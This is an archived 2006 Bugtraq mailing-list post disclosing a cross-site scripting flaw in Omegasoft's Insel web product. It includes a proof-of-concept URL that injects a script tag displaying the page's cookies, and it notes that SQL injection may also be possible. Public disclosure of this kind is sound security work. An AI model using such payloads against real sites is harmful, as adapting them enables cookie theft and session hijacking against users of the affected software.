[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XSS in Omegasoft's Insel

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS in Omegasoft's Insel
From: "MC Iglo" <mc.iglo@xxxxxxxxx>
Date: Fri, 26 May 2006 16:09:00 +0200

Hi together,

This also works on serveral web-pages of this product.
http://host/OmegaMw7a.ASP?WCI=Logon&WCE=0;<script>alert(unescape(document.cookie));</script>
There might be some ways for SQL-Injection, too, but i am not willing
to try this at the real system :)

Vendor notified as CC

regards
MC.Iglo

Prev by Date: Re: Sun single-CPU DOS
Next by Date: Docebo LMS 2.05 Remote File Include
Previous by thread: [SECURITY] [DSA 1075-1] New awstats packages fix arbitrary command execution
Next by thread: Docebo LMS 2.05 Remote File Include
Index(es):
- Date
- Thread